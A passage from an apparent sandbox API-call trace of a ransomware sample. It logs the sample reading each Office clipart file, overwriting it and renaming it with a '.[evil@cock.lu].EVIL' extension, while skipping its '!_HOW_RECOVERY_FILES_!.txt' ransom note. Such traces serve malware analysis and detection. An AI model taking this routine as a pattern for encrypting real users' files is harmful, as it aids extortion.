lpFindFileData=0x84b0fdda00) returned 1 [0141.947] wcsstr (_Str="J0107452.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0141.947] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107452.WMF") returned 69 [0141.947] wcscmp (_String1="J0107452.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0141.947] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0107452.WMF") returned 0x0 [0141.947] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107452.WMF") returned 0x45 [0141.947] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107452.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107452.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0141.949] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e24040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e24040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x52e0, lpOverlapped=0x0) returned 1 [0141.984] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0141.984] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0141.984] _errno () returned 0x84b1160840 [0141.984] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0141.984] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e24040*, nNumberOfBytesToWrite=0x5300, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e24040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x5300, lpOverlapped=0x0) returned 1 [0141.984] CloseHandle (hObject=0x1a8) returned 1 [0141.984] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107452.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0141.985] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0141.985] __uncaught_exception () returned 0x84b1160800 [0141.985] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0141.985] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107452.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107452.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107452.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107452.wmf.[evil@cock.lu].evil")) returned 1 [0141.986] ??_V@YAXPEAX@Z () returned 0x1 [0141.988] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107452.WMF", dwFileAttributes=0x200) returned 0 [0141.989] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0141.989] wcsstr (_Str="J0107456.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0141.989] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107456.WMF") returned 69 [0141.989] wcscmp (_String1="J0107456.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0141.989] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0107456.WMF") returned 0x0 [0141.989] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107456.WMF") returned 0x45 [0141.989] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107456.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107456.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0141.991] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b303f040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b303f040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0xe8c, lpOverlapped=0x0) returned 1 [0142.074] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0142.074] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0142.074] _errno () returned 0x84b1160840 [0142.074] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0142.074] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b303f040*, nNumberOfBytesToWrite=0xea0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b303f040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0xea0, lpOverlapped=0x0) returned 1 [0142.074] CloseHandle (hObject=0x1a8) returned 1 [0142.075] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107456.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0142.075] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0142.075] __uncaught_exception () returned 0x84b1160800 [0142.075] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0142.075] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107456.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107456.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107456.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107456.wmf.[evil@cock.lu].evil")) returned 1 [0142.166] ??_V@YAXPEAX@Z () returned 0x1 [0142.169] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107456.WMF", dwFileAttributes=0x200) returned 0 [0142.169] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0142.169] wcsstr (_Str="J0107458.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0142.169] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107458.WMF") returned 69 [0142.169] wcscmp (_String1="J0107458.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0142.169] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0107458.WMF") returned 0x0 [0142.169] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107458.WMF") returned 0x45 [0142.169] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107458.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107458.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0142.171] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2b040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2b040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0xdf0, lpOverlapped=0x0) returned 1 [0142.188] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0142.188] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0142.188] _errno () returned 0x84b1160840 [0142.188] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0142.188] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2b040*, nNumberOfBytesToWrite=0xe00, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2b040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0xe00, lpOverlapped=0x0) returned 1 [0142.188] CloseHandle (hObject=0x1a8) returned 1 [0142.188] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107458.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0142.188] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0142.189] __uncaught_exception () returned 0x84b1160800 [0142.189] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0142.189] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107458.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107458.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107458.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107458.wmf.[evil@cock.lu].evil")) returned 1 [0142.189] ??_V@YAXPEAX@Z () returned 0x1 [0142.192] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107458.WMF", dwFileAttributes=0x200) returned 0 [0142.192] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0142.192] wcsstr (_Str="J0107468.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0142.192] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107468.WMF") returned 69 [0142.192] wcscmp (_String1="J0107468.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0142.192] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0107468.WMF") returned 0x0 [0142.192] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107468.WMF") returned 0x45 [0142.192] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107468.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107468.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0142.194] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e22040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e22040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x258c, lpOverlapped=0x0) returned 1 [0142.225] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0142.225] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0142.225] _errno () returned 0x84b1160840 [0142.225] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0142.225] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e22040*, nNumberOfBytesToWrite=0x25a0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e22040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x25a0, lpOverlapped=0x0) returned 1 [0142.225] CloseHandle (hObject=0x1a8) returned 1 [0142.225] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107468.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0142.225] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0142.225] __uncaught_exception () returned 0x84b1160800 [0142.225] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0142.226] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107468.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107468.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107468.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107468.wmf.[evil@cock.lu].evil")) returned 1 [0142.227] ??_V@YAXPEAX@Z () returned 0x1 [0142.229] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107468.WMF", dwFileAttributes=0x200) returned 0 [0142.229] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0142.229] wcsstr (_Str="J0107480.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0142.229] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107480.WMF") returned 69 [0142.229] wcscmp (_String1="J0107480.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0142.229] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0107480.WMF") returned 0x0 [0142.229] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107480.WMF") returned 0x45 [0142.229] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107480.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107480.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0142.231] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e21040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e21040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x1788, lpOverlapped=0x0) returned 1 [0142.239] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0142.239] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0142.239] _errno () returned 0x84b1160840 [0142.239] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0142.239] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e21040*, nNumberOfBytesToWrite=0x17a0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e21040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x17a0, lpOverlapped=0x0) returned 1 [0142.239] CloseHandle (hObject=0x1a8) returned 1 [0142.239] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107480.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0142.239] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0142.239] __uncaught_exception () returned 0x84b1160800 [0142.239] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0142.240] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107480.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107480.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107480.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107480.wmf.[evil@cock.lu].evil")) returned 1 [0142.240] ??_V@YAXPEAX@Z () returned 0x1 [0142.243] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107480.WMF", dwFileAttributes=0x200) returned 0 [0142.243] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0142.243] wcsstr (_Str="J0107482.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0142.243] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107482.WMF") returned 69 [0142.243] wcscmp (_String1="J0107482.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0142.243] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0107482.WMF") returned 0x0 [0142.243] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107482.WMF") returned 0x45 [0142.243] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107482.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107482.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0142.245] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e28040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e28040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x1374, lpOverlapped=0x0) returned 1 [0142.269] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0142.269] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0142.269] _errno () returned 0x84b1160840 [0142.269] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0142.269] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e28040*, nNumberOfBytesToWrite=0x1380, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e28040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x1380, lpOverlapped=0x0) returned 1 [0142.269] CloseHandle (hObject=0x1a8) returned 1 [0142.270] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107482.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0142.270] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0142.270] __uncaught_exception () returned 0x84b1160800 [0142.270] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0142.270] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107482.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107482.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107482.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107482.wmf.[evil@cock.lu].evil")) returned 1 [0142.271] ??_V@YAXPEAX@Z () returned 0x1 [0142.274] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107482.WMF", dwFileAttributes=0x200) returned 0 [0142.274] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0142.274] wcsstr (_Str="J0107484.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0142.274] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107484.WMF") returned 69 [0142.274] wcscmp (_String1="J0107484.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0142.274] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0107484.WMF") returned 0x0 [0142.274] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107484.WMF") returned 0x45 [0142.274] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107484.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107484.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0142.276] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e27040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e27040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0xbe0, lpOverlapped=0x0) returned 1 [0142.304] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0142.304] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0142.304] _errno () returned 0x84b1160840 [0142.304] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0142.304] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e27040*, nNumberOfBytesToWrite=0xc00, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e27040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0xc00, lpOverlapped=0x0) returned 1 [0142.304] CloseHandle (hObject=0x1a8) returned 1 [0142.305] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107484.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0142.305] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0142.305] __uncaught_exception () returned 0x84b1160800 [0142.305] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0142.305] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107484.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107484.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107484.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107484.wmf.[evil@cock.lu].evil")) returned 1 [0142.306] ??_V@YAXPEAX@Z () returned 0x1 [0142.308] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107484.WMF", dwFileAttributes=0x200) returned 0 [0142.309] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0142.309] wcsstr (_Str="J0107488.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0142.309] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107488.WMF") returned 69 [0142.309] wcscmp (_String1="J0107488.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0142.309] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0107488.WMF") returned 0x0 [0142.309] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107488.WMF") returned 0x45 [0142.309] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107488.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107488.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0142.310] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e28040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e28040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x1f40, lpOverlapped=0x0) returned 1 [0142.318] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0142.318] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0142.318] _errno () returned 0x84b1160840 [0142.318] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0142.318] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e28040*, nNumberOfBytesToWrite=0x1f60, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e28040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x1f60, lpOverlapped=0x0) returned 1 [0142.318] CloseHandle (hObject=0x1a8) returned 1 [0142.318] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107488.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0142.318] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0142.318] __uncaught_exception () returned 0x84b1160800 [0142.318] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0142.318] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107488.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107488.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107488.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107488.wmf.[evil@cock.lu].evil")) returned 1 [0142.336] ??_V@YAXPEAX@Z () returned 0x1 [0142.338] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107488.WMF", dwFileAttributes=0x200) returned 0 [0142.338] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0142.338] wcsstr (_Str="J0107490.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0142.338] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107490.WMF") returned 69 [0142.338] wcscmp (_String1="J0107490.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0142.338] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0107490.WMF") returned 0x0 [0142.338] 